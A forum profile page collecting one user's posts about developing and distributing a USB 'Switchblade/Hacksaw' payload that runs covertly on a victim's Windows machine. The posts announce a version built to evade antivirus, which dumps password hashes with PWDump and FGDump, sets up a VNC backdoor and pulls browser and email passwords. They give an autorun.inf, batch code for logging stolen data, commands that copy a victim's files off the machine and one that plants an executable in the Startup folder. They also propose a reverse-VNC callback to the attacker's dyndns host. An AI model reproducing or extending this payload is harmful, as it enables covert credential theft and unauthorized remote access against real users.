GonZor
-
Posts
352 -
Joined
-
Last visited
Posts posted by GonZor
-
-
GonZor,
Nice job! The 'no disk' error is fixed!
One more problem: the PWDUMP.EXE is not responding. The logfile is stuck at size 3Kb. (I'm running on a Windows XP Pro. x64...)
Logging continues normally when I end PWDUMP.EXE in taskmanager.
Thats what I wanted to hear about the no disk error, for those of you interested I re wrote the drive search function in vbs because vbs is "smarter" and can detect what drives it needs to search where as with batch it was forcing a search even though the drive didn't exist.
I will look into the PWDump problem, I haven't had an issue but it sounds like a problem with PWDump running on your system. Could you try running PWDump manually and see if it will run properly.
wow the noobs seem to betaking over teh boards :Pits getting waay too crowded for my liking :(
Who exactly are you referring to ? If you are referring to me, please elaborate or If you are referring to the people who are reporting bugs and such, simply go away I have asked them to. No one here claims to be a "1337 h4x0r", call me a noob if you like but your opinion means as much to me as a punch in the face (don't need it, don't want it).
EDIT - DLSS, before you start calling us noobs take a look at this. Not only do they consider themselves "1337" but "santa" also originally claimed my payload as his. I must be doing something right if people wish to take ownership of it.
-
To avoid the "port forwarding issue" I modified my payload so the victim connects to my pc. So you only have to make a forwarding at your router which is very useful.
Quick'n dirty howto:
1. Get a dyndns account to provide the current ip adress 2. Write some code to let the vnc.exe connect to your static hostname 3. Get the vncviewer and run it in the listener mode
If you'd like I can provide the code.
Sounds Like a good Idea, I may incorporate this into the next release depending on the feedback.
-
Finally out of beta:
The long awaited V2.0 is now out of beta, sorry for the delay.
Whats New:
- [li]Restructured the payload and rewritten half the code (reduced size)[/li]
[li]Fixed VNC (confirmed working - new password is "easy")[/li]
[li]Added the option to use either FGDump or PWDump (or both)[/li]
[li]Rewritten the search function in VBS, hope fully fixed the "no disk error"[/li]
[li]Changed the way the files are named, now named as - "%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%][/li]
[li]Updated several parts so they are now undetected by most AV, to the best of my knowledge most AV's will only detect sbs.exe (part of the Hacksaw)[/li]
* Please note for VNC to work you must have the correct ports forwarded on the "vicitims" router and firewall and such...
I cant think of any other updates, Though I may have forgotten some. Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below...
- [li]
[li]2. Edit the AUTORUN.INF[/li]
[li]3. Run SBConfig from your flash drive.[/li]
* Please note the U3 menu system will not function on a non U3 drive but the payload will work fine (dont enable the U3 menu in SBConfig and you will be fine)
*If you don't Know how to make your own autorun.inf, use the following code
[autorun] action=Enable USB Flash Drive open=wscript go.vbs
As usual any feedback is welcome, please let me know if you are still encountering the no disk error. I have re written the search function in vbs and this should get rid of the problem but I may be wrong and have no way of testing. Thanks and once again sorry about the delays.
EDIT: As usual Linky In my Sig
-
Have you tried truecrypt?
-
I'm glad I can help, I'm surprised what I write actually makes sense to someone other than me.
-------------------
If you open up a cmd and type "set" this will display a list of variables set on yopur machine, a lot of them will be windows variables, but some may be specific to your machine. The windows variables are the ones that become useful when doing something like this. After you take a quick look at this list you will notice two things wrong with the following line.
file.exe /A:C "%homepath%%username%Desktop*.jpg" "%fd%Documents%computername%Pictures" /I /P
Firstly I gave you the wrong variable :-(
The %homepath% variable expands to Documents and Settings%username% you will notice that this doesn't have a drive letter so it will only work if run from the partition where windows is installed. If we were to use the %homepath% variable we would need to use the %homedrive% variable before it, like so %homedrive%%homepath%. When expanded this would look something like this C:Documents and Settings%username%, when look at the variable list you may have noticed the %userprofile% variable which would expand to the same as %homedrive%%homepath%, so we should have been using the %userprofile% variable, sorry about that.
Secondly, I'm sure you have already figured this one out after reading that, the %homepath% variable (like the %userprofile% variable) expands to Documents and Settings%username% therefore when used like you have "%homepath%%username%" it will expand to Documents and Settings%username%%username% and as you can see wouldn't work.
The solution, replace the %homepath% variable with the %userprofile% variable and take out the %username% variable. Each line should now look something like this.
file.exe /A:C "%userprofile%Desktop*.jpg" "%fd%Documents%computername%Pictures" /I /P
Is there any way I can execute this keeping the window open so I can see my error's or what I'm doing wrong?My suggestion is to use SciTE (Scintilla Text Editor), It has syntax highlighting and also has a window to view the output of the code (that does not disappear). If you want a screen shot to explain what I mean I will upload one later, but for now I'm off to wendys :P
-
-----------------------------
Ill apologise now to all those people who I have not had time to answer your questions, I have been really busy recently. I will try to release V2.0 tomorrow if time permits. If I have missed your question I'm sorry and please pm me, you may not be the only person who wants to know.
-----------------------------
Hey Gonzor,Just wanna report in some personal bug feedback.
I am getting this message:
======================
Windows - No Disk X
======================
X There is no disk in the drive.
Please insert a disk into drive.
|Cancel| |Try Again| |Continue|
And it is the cmd. exe process that is running during this error. This also occurs when Netpass runs (even when netpass is disabled [WTF?])
Otherwise, the rest of the payload works like a charm. Hacksaw works perfectly - just as long as I log in and stuff like you said. Keep up the good work!
This has been annoying me quite a bit, from what we can tell the error is caused by having a card reader. I don't have a card reader so I have never experienced this error first hand and there have been several parts of the story that vary for each person so it is very difficult to figure out EXACTLY what is causing this error. It shouldn't have anything to do with netpass since it happens when it is disabled (unless you are saying netpass runs even when it is meant to be disabled). The HakSaw should actually work now without having to wait until the next time you log on, let me know if it isn't because it works for me so I will have to test that.
Thanks alot GonZor, makes much more sense now. Appreciate you takin the time to explain each step individually
No problem, just giving back what I can.
Just thought I would say the problem seems to be "%Documents and Settings%" variable. By changing it to C:Documents and Settings everything works fine this goes for file.exe. Also tried xcopy same issue. Anyone else had this problem?I feel so stupid, This is why we should learn to read properly... [me=GonZor]slaps self[/me]
There is no "%Documents and Settings%" variable, assuming your <source> now looks like this
"C:Documents and Settings%username%My Documents*.jpg"
The "%homepath%" variable will expand to what you want. hence the <source> could be rewritten as this which is better in case they have windows installed on another partition.
"%homepath%My Documents*.jpg"
I use the trendmicro internet security for av,,, It caught the fgdump,, and the cachedump as well ,, It gave the info, But the big red Flag that popped up would kinda freak out someone!!! If they used the same av........ Do other av's catch these things or is it just me???Unfortunately some of the tools are detected by certain AV, I was unaware of trend micro detecting fgdump and cachedump. Its odd that it allowed those tool to dump the information, you should look at your AV settings and change them to deny access for these programs.
-----------------------------
Are you Mark Frederickson? If so please pm me asap.
-----------------------------
-
-- Received demonoid invite from Cosmo many thanks.
Once I have some invites I will share
-
how do i get this to work all i get when i click it is it flashes cmd for a sec and disapperse
and can u make a U3 version?
File (file.exe) DOWNLOAD
This tool is similar to fc.exe. But while the function is the same, operations are differen, you can choose more than one searchmask and do diferent tasks like Copying, Moving, Deleting, ...
Warning: Like my other tools, this is Beta software. I'm not responsible for any damages on your or other systems.
Its a command line tool, it doesn't have a gui. read the parameter in the first post...
File (file.exe) DOWNLOADThis tool is similar to fc.exe. But while the function is the same, operations are differen, you can choose more than one searchmask and do diferent tasks like Copying, Moving, Deleting, ...
Warning: Like my other tools, this is Beta software. I'm not responsible for any damages on your or other systems.
Why I've created this:
Because fc.exe has several bugs, some fixed here.
Parameter:
file.exe /A:[C D M SD] "C:*.txt + C:*.doc" "X:Files" [/I] [/O] [/P] [/Box] [/Log] [/Debug] file.exe /A:SC <Target> <Linkfile> [<Workingdir> <Args> <Description> <Icon> <Shortcutkey> <IconNo> <Max|Min|Normal>] [/Debug] file.exe /A:E file.exe /Src /A:C Copies found Files to the Targetfolder /A:M Moves found Files to the Targetfolder /A:D Deletes found Files /A:SD Moves found Files to Paper Bin /A:SC Creates a Shortcut /A:E Empties the Paper Bin /I Includes Subfolders to the Search /O Overwrites Files into the Targetdirectory (Only Copying and Moving) /P Creates the same Folder Structure as Found (Only Copying and Moving) /Box Shows a Messagebox after Finishing /Log Creates a Logfile into the Targetfolder (Copying and Moving into the Targetfolder, Deleting into Tempfolder) /Debug Shows a Messagebox which Contains all Variables and their Values /Src Appends the Sourcecode to a .ahk File "C:*.txt + C:*.doc" Strings which shall be searched "X:Files" Targetfolder where the Files shall be copied/moved For the Shortcutsyntax: If you want to obmit a parameter you have to define it like "" for empty space. Else it will fail or define the parameter wrong. Examples: file.exe /A:SC C:Downloads Downloads.lnk "" "" Downloaddirectory Creates a Shortcut to the Folder C:Downloads, Linkfile is Downloads.lnk at the Scriptdirectory, no workingdir, no arguments but a Diescription (It's the Downloaddirectory) file.exe /A:D "C:Dokumente und EinstellungenObi-WahnDesktop*.lnk" Deletes all Shortcuts on the Desktop WITHOUT moving them to the Paperbin file.exe /A:SD "C:Dokumente und EinstellungenObi-WahnDesktop*.lnk" Deletes all Shortcuts on the Desktop and moves them to the Paperbin. file.exe /A:C "C:*.txt" "X:Files" /I /P Copies all Textfiles to the Targetdirectory (X:Files), includes Subfolders to the search and creates the same folder structure as on the Computer.
-
I actually wasn't sure what this could be used for, but it could be helpful. Also, the board in which it sits has a lot of good info on silent installation of various programs.
Easiest way to silently install something is to make a msi
-
It looks to me like your defining the flash partition as drive i: I don't see how it gets defined as %fd%
Sorry if this makes no sense at all, just got home from a party. I'll try to explain each line individually.
:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
FOR %variable IN (set) DO <command>
%variable specifies a single letter variable (my chosen variable %%i)
(set) specifies what the variable will be each time (in this case the alphabet)
<command> specifies the command to do with each variable in the set (in this case I used an open bracket just for readability)
:: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC IF EXIST %%i:SystemSRCdrv.dat (
The first command for each variable, IF EXIST <file> <command>
<file> specifies the file to search for (in this case we are searching for the file SystemSRCdrv.dat but this can be changed to any file)
<command> specifies the command to do if the file exists (once again I used an open bracket for readability, I find it easier)
SET fd=%%i:SystemSRC
This is the command to be completed once the file is found to exist, SET <variable>=<string>
<variable> specifies the variable that we will later call on to expand into the string (in this case the variable is fd and is later called as %fd%)
<string> specifies what we want the variable to expand to when it is called (in this case we want it to expand to the drive letter & the folder path SystemSRC)
) )
These are just the closing brackets to both statements, first closing the IF EXIST command and second closing the FOR command.
This could be written as one line but for readability I use the brackets. I hope that made sense but time now for some sleep :shock:
-
So none of the AVs pick this one up as of yet? even if u have it pull all the passwords? Also would it be possible to add a Firefox Password Puller?@setzer: Actually, I've tested it only on AVG, Norman and Avast AV. And there wasn't any beep (accordingly to ZA Firewall). And I've add a FF password reader, which works on a testinstallation of FF on my machine. Setting into the .ini File: Section "DUMP", Key "FFPasswords"
NOD32 detects the usual (dialupass.exe, pspv.exe). I'm assuming the only difference between your "tools" and other payloads is you have used the most recent versions? (eg mailpv.exe)
-
The script forgetting all the account info for email Addy and pass is great! IS there one in order to get the myspace password also??
Just curious. . . . . . . . . .
Depending on whether the user has saved the password this COULD be retrieved through either lsa secrets, IE password or Firefox password. As far as I know there is no special way that a myspace password is saved, maybe myspace IM saves it somewhere?? I don't know I've never used it.
-
What were you thinking of installing?
-
@ GonZor,
Using your script with file.exe and it isn't working am I doing something wrong?
To be honest I have never used file.exe so I am unfamiliar with how its used but looking at your code, I am going to assume the last three lines should look like this:
file.exe /A:C "%Documents and Settings%%username%My Documents*.jpg" "%fd%Documents%computername%Pictures" /I /P file.exe /A:C "%Documents and Settings%%username%My Documents*.bmp" "%fd%Documents%computername%Pictures" /I /P file.exe /A:C "%Documents and Settings%%username%My Documents*.gif" "%fd%Documents%computername%Pictures" /I /P
assuming the syntax is file.exe /A:C <source> <destination> /I /P, this should work fine now. the problem was you were saying the destination was on the CD partition (which you obviously cant write to a CDFS partition).
-
Another way to do this is to use PStart.exe, which I personally prefer, but to each his own.
Personally I use both, the main reason as pointed out by oligarchy314:
I like this better than all those start menu replacement programs, because this does not add a process, and thereby uses no ram or cpu cycles.Although when you have a number of apps organization is a must and pstart is better for that.
-
In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)
SET include="G:SRCInclude IF EXIST %include%0.dat"
When the second line is expanded it will look like this
"G:SRCInclude0.dat"
Note the " on either end, If I were to enclose each in " like so
SET include="G:SRCInclude" IF EXIST "%include%0.dat"
When the second line is expanded it will look like this, and fail
""G:SRCInclude"0.dat"
To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.
Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep.
I'm doing some tweaks to it now and compiling the batch files to executables, etc.Id love to take a look at the tweaks you've made, as well as the executable. What language?
-
...So if you do create a virus/worm/trojin/etc... you haven't done anything illegal yet. Once you deploy the malware, then you have committed a felony.
By deploy do you mean distribute (as in the way the switchblade/hacksaw has been amongst the community) or use maliciously (using the switchblade/hacksaw in an unauthorized situation)
-
You need to detect where the flash partition is mapped. Looking at my go.bat you will notice that I have done this by searching for a dat file which is on the flash partition. Normally you will need to create the file manually but SBConfig.exe does this for you when you use my payload.
:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO ( IF EXIST %%i:NUL.EXT ( :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC IF EXIST %%i:SystemSRCdrv.dat ( SET fd=%%i:System ) ) ) :: CREATE LOG DIRECTORY IF NOT EXIST %fd%Logs%computername% ( MD %fd%Logs%computername% ) :: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG DIR /a-d /s "%fd%Logs%computername%" | FIND /c ".log" > "%fd%SRC###" SET /p count=<"%fd%SRC###" :: SET LOG PATH SET log="%fd%Logs%computername%%computername%-[%count%].log"
Create a file on your flash partition SystemSRCdrv.dat. Place that at the top of your go.bat, now when you refer to your log file use %log%, this will expand to X:SystemLogs%computername%%computername%-[%count%].log where X is the flash drive letter and count is the amount of logs for that computer in the folder.
-
The current Winrar script works well enough, but yeah, TrueCrypt will provide the be-all end-all solution.
True crypt isnt the be-all end-all solution, For the reasons specified below...
The problem with true crypt is, that you need the driver installed on the system if you're not an admin to work with it.A lot of the tools used in the payload (specifically the ones that get detected by AV) need an admin account to work, I would create a combination of true crypt and rar.
-
this is why I am a Hackling and you are a Zombie.
As long as I'm not a penguin its ok by me :P
Just remember /? is your friend, some of the explanations are very basic but most of them are quite useful
-
It all seemed simple enough right?
copy H:WIPCMDVirtuMem.exe C:Documents and SettingsAll UsersStart MenuProgramsStartup
Nope! Incorrect syntax. So I tried copy H:WIPCMDVirtuMem.exe C: and... tada! Either my syntax is wrong (please feel free to enlighten me)...
You were missing the quotes from around your destination, it should have read
copy "H:WIPCMDVirtuMem.exe" "C:Documents and SettingsAll UsersStart MenuProgramsStartup" /y
Notice the quotes around the source and destination pats, didn't need them around the source because there are no spaces but I do it anyway, I also added a /y switch to copy the file even if it exists (just to make sure its your file not a dummy file).
-
So how would i be able to integrate this with switchblade on my U3?
Which part? reading through the thread there is a lot of information here.
-
Thanks Gonzor.
Could be interesting for next versions add some features like try to catch domain passords, (I don't know if this could be possible) or install any kind of sniffer for to get "on the fly" passwords.
another idea its to add a Keylogger...
what do you think about?
The "sniffer" is possible, I made something similar a while back and then just used sniffpass to filter the raw packets. The problem is the need to silently install WinPcap. I don't like the idea of key loggers and I don't think I will be adding one to my payload.
-
first of all check out my payload, take a look at SRCgo.bat in the ISO. Have you considered how you are going to make this customizable? Take a look at how my payload works because you wont be able to comment out parts of the payload you don't want on a CDFS partition.
If you need any help just ask. If you want an explanation of any of my payload just ask I haven't commented go.bat very well
"Silent" drive format utility?
in USB Hacks
Posted
Here you go mate, This will quick format the drive to FAT with the volume label NUKED.
Obviously replace %1 with your drive letter variable.
The FORMAT wasn't working for the obvious reason, it required user input :P
Although it seems simpler, It takes much longer. Neither option will securely delete your data but a quick format is much faster.
Hope that answers everyone, and merry Christmas!